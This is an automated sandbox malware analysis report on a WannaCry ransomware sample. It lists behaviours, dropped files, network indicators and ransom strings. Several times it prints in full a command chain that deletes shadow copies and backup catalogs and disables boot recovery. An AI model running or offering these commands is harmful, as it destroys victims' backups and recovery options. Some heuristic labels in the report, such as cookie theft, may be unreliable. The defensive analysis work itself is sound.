Analysis Report

Overview

General Information

Joe Sandbox Version: 18.0.0
Analysis ID: 269081
Start time: 18:52:11
Joe Sandbox Product: Cloud
Start date: 12.05.2017
Overall analysis duration: 0h 12m 5s
Report type: full
Sample file name: mssecsvc.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
Detection: MAL
Classification: mal100.evad.rans.phis.spyw.troj.winEXE@57/432@2/8
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 230
  • Number of non-executed functions: 254
EGA Information:
  • Successful, ratio: 90%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): svchost.exe, VSSVC.exe, conhost.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Too many dropped files, some of them have not been restored


Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely requires more UI automation
Sample is a service DLL but no service has been registered
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview


Change of System Appearance:

Contains functionality to change the wallpaper
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,5_2_10004F20
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,14_2_00407E80
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 18_1_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,18_1_00407E80

Operating System Destruction:

Mass deletion, destroys many files
Source: c:\programdata\ywepvofkuzu108\tasksche.exe; File deleted: Number of file deletion 1001 exceeds threshold 400

Cryptography:

Public key (encryption) found
Source: taskhsvc.exe; Binary or memory string: -----BEGIN RSA PUBLIC KEY-----
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\tasksche.exe; Code function: 3_2_004018B9 CryptReleaseContext,3_2_004018B9
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004170 CryptExportKey,CryptGetKeyParam,GlobalAlloc,CryptEncrypt,GlobalFree,5_2_10004170
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003C00 CryptDestroyKey,5_2_10003C00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,5_2_10003AC0
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004040 CryptExportKey,GlobalAlloc,CryptExportKey,_local_unwind2,CreateFileA,WriteFile,_local_unwind2,5_2_10004040
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004350 CryptGenKey,5_2_10004350
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,5_2_10003F00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,5_2_10004440
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004370 EnterCriticalSection,CryptEncrypt,LeaveCriticalSection,LeaveCriticalSection,5_2_10004370
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004420 CryptGenRandom,5_2_10004420
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003D10 GetFileAttributesA,CryptEncrypt,_local_unwind2,CryptDecrypt,GetFileAttributesA,strncmp,_local_unwind2,5_2_10003D10
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003A80 GetFileAttributesA,GetFileAttributesA,CryptAcquireContextA,5_2_10003A80
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003BB0 GetFileAttributesA,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,5_2_10003BB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_004046F0 CryptImportKey,14_2_004046F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_004046B0 CryptAcquireContextA,14_2_004046B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,14_2_004049B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,14_2_004047C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,14_2_00404AF0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,14_2_00404770
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,14_2_00404B70
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 18_1_00404770 CryptReleaseContext,18_1_00404770
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe; Code function: 19_2_0033D6F1 CRYPTO_num_locks,CRYPTO_set_locking_callback,CRYPTO_THREADID_set_callback,__stack_chk_fail,19_2_0033D6F1
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe; Code function: 19_2_00335EA1 ERR_load_crypto_strings,OPENSSL_add_all_algorithms_noconf,SSLeay_version,strcmp,__stack_chk_fail,19_2_00335EA1
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe; Code function: 19_2_0033C797 abort,CryptAcquireContextA,CryptGenRandom,__stack_chk_fail,19_2_0033C797
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe; Code function: 19_2_00339423 i2d_RSAPrivateKey,free,CRYPTO_free,__stack_chk_fail,19_2_00339423
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe; Code function: 19_2_0033E737 i2d_X509,free,X509_free,memcpy,CRYPTO_free,X509_get_pubkey,EVP_PKEY_get1_RSA,EVP_PKEY_free,__stack_chk_fail,19_2_0033E737
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe; Code function: 19_2_00337FA7 abort,abort,abort,abort,abort,RSA_public_decrypt,__stack_chk_fail,19_2_00337FA7

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,5_2_10003AC0
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,5_2_10003F00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; Code function: 5_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,5_2_10004440
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_004046F0 CryptImportKey,14_2_004046F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,14_2_004049B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,14_2_00404B70
Deletes shadow drive data (may be related to ransomware)
Source: unknown; Process created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: unknown; Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknown; Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: @WanaDecryptor@.exe; Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe; Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Process created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe; Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exe; Binary or memory string: 2@Z3EDITc vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietffv
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: vssadmin.exe; Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe; Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe; Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe; Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe; Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
May disable shadow drive data (uses vssadmin)
Source: unknown; Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_004035A0

Networking:

Contains functionality to download additional files from the internet
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; Code function: 14_2_0040DB80 recv,14_2_0040DB80
Downloads files from webservers via HTTP
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Found strings which match to known social media URLs
Source: @WanaDecryptor@.exe; String found in binary or memory: Yahoo equals www.yahoo.com (Yahoo)
Source: taskhsvc.exe; String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
URLs found in memory or binary data
Uses HTTPS
Source: unknown; Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown; Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown; Network traffic detected: HTTP traffic on port 49195 -> 443
HTTP GET or POST without a user agent
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic; TCP traffic: 192.168.1.16:49198 -> 79.137.85.71:9001
Source: global traffic; TCP traffic: 192.168.1.16:49199 -> 195.154.107.23:993
Source: global traffic; TCP traffic: 192.168.1.16:49200 -> 138.68.0.4:9090
Installs TOR (Internet Anonymizer)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe; File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\tor.exe

Boot Survival:

Contains functionality to start Windows services
Source: C:\mssecsvc.exe; Code function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
Creates an autostart registry key
Source: C:\Windows\System32\reg.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ywepvofkuzu108
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe; File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SD89A7.tmp
Stores files to the Windows start menu directory

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, Code function: 14_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,14_2_0040D6A0
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe, Code function: 19_2_001EAF67 listen,listen,listen,__stack_chk_fail,19_2_001EAF67
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe, Code function: 19_2_001EC647 abort,abort,abort,_errno,bind,abort,connect,connect,__stack_chk_fail,19_2_001EC647
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe, Code function: 19_2_001EB015 _errno,_errno,setsockopt,bind,bind,getsockname,abort,memcpy,abort,__stack_chk_fail,19_2_001EB015
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe, Code function: 19_2_0031739B memset,memset,memset,memset,htonl,abort,bind,listen,getsockname,connect,getsockname,_errno,__stack_chk_fail,19_2_0031739B

Stealing of Sensitive Information:

Searches for user specific document files
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, Key value created or modified: C:\Users\Default\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, Key value created or modified: C:\Users\Default\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, Key value created or modified: C:\Users\luketaylor\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, Key value created or modified: C:\Users\luketaylor\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, Key value created or modified: C:\Users\Public\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, Key value created or modified: C:\Users\Public\Documents
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, Directory queried: number of queries: 1017
Steals Internet Explorer cookies
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\TS324TLF.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\P2JX6PN9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\70BQC459.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\BQV5SLZ9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\EVRD7JOF.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\XO4C6RUK.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\I75LB17C.txt

Persistence and Installation Behavior:

Drops PE files
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\ProgramData\ywepvofkuzu108\u.wnry
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\Users\Default\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\ssleay32.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libssp-0.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\ProgramData\ywepvofkuzu108\taskdl.exe
Source: C:\Windows\tasksche.exe, File created: C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_core-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\zlib1.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libgcc_s_sjlj-1.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\tor.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libeay32.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\Users\luketaylor\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\Users\Public\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\ProgramData\ywepvofkuzu108\taskse.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_extra-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe, File created: C:\@WanaDecryptor@.exe
Source: C:\mssecsvc.exe, File created: C:\Windows\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe, File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\mssecsvc.exe, File created: C:\Windows\tasksche.exe
Installs a Chrome extension
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\~SD9636.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\~SD9637.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\~SD9638.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\~SD9639.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\~SD964A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\~SD964B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ar\~SD964C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\bg\~SD964D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ca\~SD964E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\cs\~SD965F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\da\~SD9660.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\de\~SD9661.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\el\~SD9662.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en\~SD9663.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en_GB\~SD9664.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en_US\~SD9674.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\es\~SD9675.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\es_419\~SD9676.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\et\~SD9677.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fi\~SD9678.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fil\~SD9679.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fr\~SD968A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\he\~SD968B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hi\~SD968C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hr\~SD968D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hu\~SD968E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\id\~SD968F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\it\~SD9690.tmp
